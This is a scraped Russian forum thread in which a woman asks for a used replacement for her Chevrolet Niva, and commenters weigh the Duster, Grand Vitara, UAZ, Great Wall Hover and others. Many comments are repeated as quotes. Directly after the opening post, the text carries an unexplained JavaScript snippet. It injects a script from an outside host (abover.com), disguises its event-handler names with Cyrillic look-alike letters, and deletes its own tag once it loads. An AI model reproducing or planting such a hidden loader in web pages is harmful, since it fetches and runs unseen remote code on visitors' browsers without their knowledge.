Mail.RuПочтаМой МирОдноклассникиИгрыЗнакомстваНовостиПоискВсе проекты

Альтернатива Шниве.

Есть желание поменять машину. В принципе она меня устраивает, хлопот с ремонтом не доставляет, с задачами своими справляется( трасса - грунтовки, броды, колеи). В городе её не эксплуатирую. Что реально напрягает - это её аппетит и невозможность отключить полный привод. Итак. Хочу такой же, но с серебряными пуговицами. Компактный или среднего размера кузов, обязательно 5-дверка, клиренс не меньше 20 см, КПП механическая, ДВС только бензиновый, не турбо!!!,до 150 л с. Ведущие колёса - передние, подключаемый "задок", ну и умеренный расход горючего, в идеале до 10 л на сотню км. Дизайн и всякие "плюшки" не важны. Брать буду б\у, 5-10 лет, чем дешевле, тем предпочтительней, 400-450 тыс рэ, если машинка оч понравится, могу выйти за рамки бюджета. Помогите, пожалуйста. Сориетируйте по маркам и моделям под мои требования, поделитесь опытом эксплуатации.
(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?ifra...' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.оnlоad = script.оnerrоr = function () {
script.оnlоad = script.оnerrоr = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})()
Тема закрытаТема в горячихТема скрыта
Жалоба принята. Спасибо!
Пожаловаться
7 декабря
Volvo XC70 2.4 D5 205hp AWD AT
Самые лучшие впечатления от комфорта, управляемости, экономичности. После 5-ти лет эксплуатации и весомого пробега (205 тыс. км) не могу найти альтернативу для замены.
4.0
7 декабря
Honda CR-V 2.0 AT
Машину покупала в 2009 году, езжу в основном на дачу и по городу, я понимаю, что эксплуатация автомобиля не активная, но от машины просто веет надежностью. Я без проблем проскакиваю по бездорожью. мог...
4.2
Все отзывы
Поделиться темой
Отписаться
Подписаться
КомментарииКомментарииПока ни одного комментария, будьте первым!
126
Комментарий удален.Почему?
Комментарий удален.Почему?
Только обязательно с системой стабилизации
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
История переписки3
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
История переписки5
Который на дастере выполняет функцию блокировки так что голову забить можно.
СсылкаПожаловаться
наталья харлова
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
СсылкаПожаловаться
История переписки4
у дастера есть принудительное подключение задних колёс.система стабилизации даст вам уехать при вывешивании.ибо она притормаживает буксующие колёса.
СсылкаПожаловаться
наталья харлова
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
СсылкаПожаловаться
История переписки4
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
У дастера три режима: 1. Постоянный передний привод; 2. режим АВТО, т.е. передний привод с подключением привода на буксующее(буксующие) колесо(колёса); 3.Постоянный полный привод, который автоматически переключается на АВТО при превышении скорости 80км/ч. На Дастере шестиступенчатая коробка передач. 1 передача это настоящая пониженная; со 2 передачи трогаемся, на 6 передаче при 3000 оборотах движка скорость 120 км/ч. Самый экономичный режим на 6 передаче 90 км/ч, расход при этом 8 - 8,3л на 100км. Со скоростью 120 км/ч 9,5л максимум. Для двухлитрового атмосферника вполне приемлемо.
СсылкаПожаловаться
наталья харлова
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
СсылкаПожаловаться
История переписки4
Насколько я понимаю, у дастера муфта, и подключается она электроникой кратковременно при пробуксовке передних колёс? Водитель может подключать по желанию? И что даёт стабилизация?
Стабилизация даёт минимум крена на поворотах, т.е. лучшая управляемость.
СсылкаПожаловаться
G G
Только обязательно с системой стабилизации
СсылкаПожаловаться
История переписки2
О просветите как связана система стабилизации с полным приводом, это действительно интересно, в особенности интересен момент связи датчика положения руля и акселерометра, которые имеют значение только при изменении направления движения авто и при сносе колес...
СсылкаПожаловаться
О просветите как связана система стабилизации с полным приводом, это действительно интересно, в особенности интересен момент связи датчика положения руля и акселерометра, которые имеют значение только при изменении направления движения авто и при сносе колес...
СсылкаПожаловаться
История переписки3
Сама по себе ESP с полным приводом не связана никак. Вот только используя ее механизмы притормаживания колес на Дастере с ПП реализуется имитация блокировки межколесного дифференциала (подтормаживание пробуксовывающего колеса, данные берутся с датчиков АБС).
причем для этого надо включить 4WD Lock т.е. заблокировать полный привод и Отключить ESP.
СсылкаПожаловаться
Игорь Игнатов
Сама по себе ESP с полным приводом не связана никак. Вот только используя ее механизмы притормаживания колес на Дастере с ПП реализуется имитация блокировки межколесного дифференциала (подтормаживание пробуксовывающего колеса, данные берутся с датчиков АБС).
причем для этого надо включить 4WD Lock т.е. заблокировать полный привод и Отключить ESP.
СсылкаПожаловаться
История переписки4
То что вы написали называется TRC, но если бы она там была, о ней бы Renault свистела во всех рекламных буклетах... А поскольку тихо не верю я во французский альтруизм, как при продаже первых Duster'ов. И скорее всего вера в подарок типа TRC подпитывается самими потребителями, т.к. просто хочется в это верить... :(((((((((((((((
СсылкаПожаловаться
То что вы написали называется TRC, но если бы она там была, о ней бы Renault свистела во всех рекламных буклетах... А поскольку тихо не верю я во французский альтруизм, как при продаже первых Duster'ов. И скорее всего вера в подарок типа TRC подпитывается самими потребителями, т.к. просто хочется в это верить... :(((((((((((((((
СсылкаПожаловаться
История переписки5
Это прописано в инструкции по эксплуатации. В принципе - работает. Единственное - включать надо заранее. если сначала вывесится, а потом пытаться включать ЛОК и отключать ЕСП - не прокатит. В реальности для блокировки муфты ПП надо продвинуться сантиметров на 10-20 для того, чтобы шарики в муфте раскатились. Об этом в инструкции не сказано.
Дастеры первых выпусков ЕСП не имели. Она появилась в конце 12 года сначала на непопулярных моделях - дезеле, потом 1,6 и только к весне 13-го на двухлитровых.
как эта система работает и что она может на практике и чего не может - подробнейшим образом обсосано на дастер-клубах.
СсылкаПожаловаться
Игорь Игнатов
Это прописано в инструкции по эксплуатации. В принципе - работает. Единственное - включать надо заранее. если сначала вывесится, а потом пытаться включать ЛОК и отключать ЕСП - не прокатит. В реальности для блокировки муфты ПП надо продвинуться сантиметров на 10-20 для того, чтобы шарики в муфте раскатились. Об этом в инструкции не сказано.
Дастеры первых выпусков ЕСП не имели. Она появилась в конце 12 года сначала на непопулярных моделях - дезеле, потом 1,6 и только к весне 13-го на двухлитровых.
как эта система работает и что она может на практике и чего не может - подробнейшим образом обсосано на дастер-клубах.
СсылкаПожаловаться
История переписки6
Я Duster смотрел только самых первых партий, когда тачку покупал, тогда такого точно не было, хотя были бешеные очереди на год вперед и предложение купить куча всякого барахла на тысяч 150 и тогда машина будет в течении пары месяцев :))))))))
СсылкаПожаловаться
Джимник
СсылкаПожаловаться
Митя Бубликов
Хундай Тускан 2,0 литра на механике то, что вы хотите.
СсылкаПожаловаться
евгении лапенок
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).
СсылкаПожаловаться
евгении лапенок
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).
СсылкаПожаловаться
Спасибо за подсказку.
СсылкаПожаловаться
наталья харлова
Спасибо за подсказку.
СсылкаПожаловаться
История переписки2
И готовьтесь кормить это чудо японского автопрома. Ибо аппетит у СГВ побольше чем у Шнивы.
СсылкаПожаловаться
Сергей Семенов
И готовьтесь кормить это чудо японского автопрома. Ибо аппетит у СГВ побольше чем у Шнивы.
СсылкаПожаловаться
История переписки3
не правда.шнива ест больше.
СсылкаПожаловаться
наталья харлова
Спасибо за подсказку.
СсылкаПожаловаться
История переписки2
если вам нужен именно отключаемый полный привод,то витара вам не подойдёт-там такая же система ,как на шниве.постоянный полный.экономить топливо особо не получится.я умудряюсь ездить по городу за 10 л на 100км.но это очень спокойная езда.
СсылкаПожаловаться
наталья харлова
Спасибо за подсказку.
СсылкаПожаловаться
История переписки2
сузуки гранд витара примерно должен вписаться в бюджет
СсылкаПожаловаться
евгении лапенок
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).
СсылкаПожаловаться
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).

Абсолютно согласен
СсылкаПожаловаться
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).

Абсолютно согласен
СсылкаПожаловаться
История переписки2
По характеристикам как вседорожника спорить не могу , а вот по цене обслуживания и надежности ,особенно по системе управления двигателем и т.п.нежелание переваривать наш бензин и зажигать лампочку чек по каждому поводу это она на первом месте в моей мастерской.Продолжайте ездить на Шеви.Расход бензина на исправном авто от 8 до 12л на сотню.Многие мои клиенты на нее персаживаются,попродовав крутые Паджеро и Лендкрузеры,садет такой тяжеловес в саланчак,выдернут.Два моста на свалку,в нашем регионе это 5000 зеленых,А шеви нас вокруг объезжает и дальше поехала на охоту и рыбалку.Вообщем по соотношению цена качество,плюс проходимость и ремонтопригодность пока ей альтернативы нет.Это мнение больше ремонтника.чем владельца.Хотя решать вам я ремонтирую и те и другие системы впрыска и управления двигателя.Но больше последнее время поглядываю на Российский автопром и мне он скаждым годом начинает нравиться все больше.
СсылкаПожаловаться
евгении лапенок
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).
СсылкаПожаловаться
Более не менее полноценная альтернатива Шниве.это Сузуки Гранд Витара,у неё у единственной в этом классе автомобилей есть пониженный ряд в трансмиссии.все остальные кроссоверные варианты с подключаемым задним приводом.безпомощны на бездорожье(там где Шнива решает свои задачи).
СсылкаПожаловаться
Игорь Гуськов
Вся проблема в том, что что бы вы не выбрали потребление топлива будет не ниже!!!
единственный вариант ставить газ или брать дизель.
СсылкаПожаловаться
Игорь Шарыкин
не понимаю какие броды может преодолевать шнива, тесть(50 лет стажа) на старенькой 4-х ступке с реечным домкратом не отваживается на такие подвиги, потому послушайте моего совета. к сожалению такое авто (о котором вы мечтаете)ещё не сделали, 10 лет внед. с подкл задом не существует а тем более с расходом меньше 10л, вообще не рекомендую покупать любую бу, затрат на неё будет много больше чем удовольствия от езды, и пардон за нескромность что делает милая девушка катаясь по ямам и бродам, может сменить стиль и купить красненький кашкай или асх. асх оптимальный вариант берите передний привод(полный не имеет смысла, он работает на скорости до 40 км-ч и толку не даёт из-за отс.диф. только лишний расход)расход 5л по трассе , так не более 7. клиренс больше у кашкая -20 ,- тоже замануха реально заявленный параметр не соответствует дейст. 20 будет от порогов, а реально если заглянешь под любое авто то увидишь множество деталей не входящих в параметр, и услышишь при заезде например на бордюр, так что не заморачивайся. самая лучшая машина это новая машина,-как сказал товарищ форд. покупай асх и катайся, у меня сестра третий год ездит ни каких проблем, - дизайн(как раз для девушки), ходовка,-класс
СсылкаПожаловаться
Игорь Шарыкин
не понимаю какие броды может преодолевать шнива, тесть(50 лет стажа) на старенькой 4-х ступке с реечным домкратом не отваживается на такие подвиги, потому послушайте моего совета. к сожалению такое авто (о котором вы мечтаете)ещё не сделали, 10 лет внед. с подкл задом не существует а тем более с расходом меньше 10л, вообще не рекомендую покупать любую бу, затрат на неё будет много больше чем удовольствия от езды, и пардон за нескромность что делает милая девушка катаясь по ямам и бродам, может сменить стиль и купить красненький кашкай или асх. асх оптимальный вариант берите передний привод(полный не имеет смысла, он работает на скорости до 40 км-ч и толку не даёт из-за отс.диф. только лишний расход)расход 5л по трассе , так не более 7. клиренс больше у кашкая -20 ,- тоже замануха реально заявленный параметр не соответствует дейст. 20 будет от порогов, а реально если заглянешь под любое авто то увидишь множество деталей не входящих в параметр, и услышишь при заезде например на бордюр, так что не заморачивайся. самая лучшая машина это новая машина,-как сказал товарищ форд. покупай асх и катайся, у меня сестра третий год ездит ни каких проблем, - дизайн(как раз для девушки), ходовка,-класс
СсылкаПожаловаться
В целом готов поддержать основной посыл,Машины с повышенной проходимостью(реальной,а не мнимой) действительно редки,дороги,и сложны в эксплуатации,в 90 % случаев задачи решаются просто повышенной геометрической проходимостью,безотносительно привода(Полный или передний),на большинстве современных кроссоверов ПП это скорее маркетинговый ход,нежели реальное подспорье для преодоления бездорожья(хотя он безусловно помогает в устойчивости автомобиля на дороге общего пользования).Поэтому совет выбрать переднеприводной Кашкай(ASX,или что то подобное) вполне разумный.
СсылкаПожаловаться
Игорь Шарыкин
не понимаю какие броды может преодолевать шнива, тесть(50 лет стажа) на старенькой 4-х ступке с реечным домкратом не отваживается на такие подвиги, потому послушайте моего совета. к сожалению такое авто (о котором вы мечтаете)ещё не сделали, 10 лет внед. с подкл задом не существует а тем более с расходом меньше 10л, вообще не рекомендую покупать любую бу, затрат на неё будет много больше чем удовольствия от езды, и пардон за нескромность что делает милая девушка катаясь по ямам и бродам, может сменить стиль и купить красненький кашкай или асх. асх оптимальный вариант берите передний привод(полный не имеет смысла, он работает на скорости до 40 км-ч и толку не даёт из-за отс.диф. только лишний расход)расход 5л по трассе , так не более 7. клиренс больше у кашкая -20 ,- тоже замануха реально заявленный параметр не соответствует дейст. 20 будет от порогов, а реально если заглянешь под любое авто то увидишь множество деталей не входящих в параметр, и услышишь при заезде например на бордюр, так что не заморачивайся. самая лучшая машина это новая машина,-как сказал товарищ форд. покупай асх и катайся, у меня сестра третий год ездит ни каких проблем, - дизайн(как раз для девушки), ходовка,-класс
СсылкаПожаловаться
По моим маршрутам броды не глубокие, до полуметра. но сомневаюсь, что "кошак" там проедет. Там скорей ЛУАЗ нужен. Шнивка на грязевой резине проходит не всегда, чернозёмы местами жидкие, трактором правда не тянули ни разу, но лебёдка - вещь нужная. Красненький асх куплю обязательно. но потом
СсылкаПожаловаться
наталья харлова
По моим маршрутам броды не глубокие, до полуметра. но сомневаюсь, что "кошак" там проедет. Там скорей ЛУАЗ нужен. Шнивка на грязевой резине проходит не всегда, чернозёмы местами жидкие, трактором правда не тянули ни разу, но лебёдка - вещь нужная. Красненький асх куплю обязательно. но потом
СсылкаПожаловаться
История переписки2
чего тогда мучаетесь берите новый хантер или патриот спорт(он для вас покрасивше будет)года три откатаете смело, и не бойтесь дизеля(главное заправляться на брендовых заправках), всё же настоятельно вам рекомендую только новое авто
СсылкаПожаловаться
наталья харлова
По моим маршрутам броды не глубокие, до полуметра. но сомневаюсь, что "кошак" там проедет. Там скорей ЛУАЗ нужен. Шнивка на грязевой резине проходит не всегда, чернозёмы местами жидкие, трактором правда не тянули ни разу, но лебёдка - вещь нужная. Красненький асх куплю обязательно. но потом
СсылкаПожаловаться
История переписки2
Насчет проходимость и потребление ниже 10 литров - наверное все-таки погорячились. Если внедорожник, то расход нужно сразу смотреть от 11-12 литров. У меня стоит такой же вопрос: Даже не плохие дороги а наличие полного отсутствия таковых. Много советовался ,смотрел. Что важно: 1)если действительно нужна машина для езды по говнам - однозначно кросоверы за борт. Только рамники. Из адекватных дешевых рамников Уаз Хантер, Патриот, Greit Wall Hover 3 (или 5), Wingle. Далее идут уже хорошие качественные внедорожники как Pajero и выше. Т.е. на 500-600 тыров Вы сможете взять либо 5-10 лет Паджерик либо практически нового уаза или грейт вола. Если хочется проходимости - лучше тогда остановиться на уазах, если комфорта - то ховер самое то. Пусть и китаец, но собирается в Гжели. По идее проблем с запчастями быть не должно. Я не считаю что 10 летний японец лучше, чем новый китаец, а по внутренностям в ховере реально чувствуешь себя как в иномарке довольно неплохого класса. Подтверждением моего мнения является то, что у нас (дикое подмосковье в шатурском районе) бегает с пару десятков ховеров и сколько говорил с владельцами почти у всех только положительные отзывы. Так что для себя я выбрал ховер 5.
СсылкаПожаловаться
наталья харлова
По моим маршрутам броды не глубокие, до полуметра. но сомневаюсь, что "кошак" там проедет. Там скорей ЛУАЗ нужен. Шнивка на грязевой резине проходит не всегда, чернозёмы местами жидкие, трактором правда не тянули ни разу, но лебёдка - вещь нужная. Красненький асх куплю обязательно. но потом
СсылкаПожаловаться
История переписки2
УАЗЕГ как вариант не рассматривали? жрёт конечно больше нивы но жидкие чернозёмы как проблема отпадут точно
СсылкаПожаловаться
Виктор
УАЗЕГ как вариант не рассматривали? жрёт конечно больше нивы но жидкие чернозёмы как проблема отпадут точно
СсылкаПожаловаться
История переписки3
Был в семье 31512, лет 15 эксплуатировали, пока не добили бедолагу. Менять его мысли не возникало, но расход совсем не гуманный.
СсылкаПожаловаться
наталья харлова
Был в семье 31512, лет 15 эксплуатировали, пока не добили бедолагу. Менять его мысли не возникало, но расход совсем не гуманный.
СсылкаПожаловаться
История переписки4
так вам шашечки или ехать? полноценный внедорожник много кушает и дорго стоит по умолчанию но не болит голова что после дождя застрянешь не доехав до дачи метров пиццот ну а кроссоверы если честно неудобны как и всё универсальное ест больше легковой как внедорожник весьма условен может устроить подставу подстав на распутице и бездорожье уж не говоря о бродах не думаю что вам будет приятно возится с хайджеком застряв в безобидной с виду луже так что я в данной ситуации выберу всё таки ниву так как в её нише (цена-функциональность в рамках вашего бюджета ) альтернативы я не вижу да и наплевать что она на постоянном полном приводе я летом снимал передний кардан и спокойно ездил по городу перед вылазками в грязь одевал его обратно и особо не парился шеви нивы у меня не было я исходил из опыта владения классической нивой ваз 21213
СсылкаПожаловаться
наталья харлова
Был в семье 31512, лет 15 эксплуатировали, пока не добили бедолагу. Менять его мысли не возникало, но расход совсем не гуманный.
СсылкаПожаловаться
История переписки4
По таким ценам только рамный Greit Wall Hover 3 других вариантов нет...
СсылкаПожаловаться
Чтобы оставить комментарий, вам нужно авторизоваться.
Новости Mail.Ru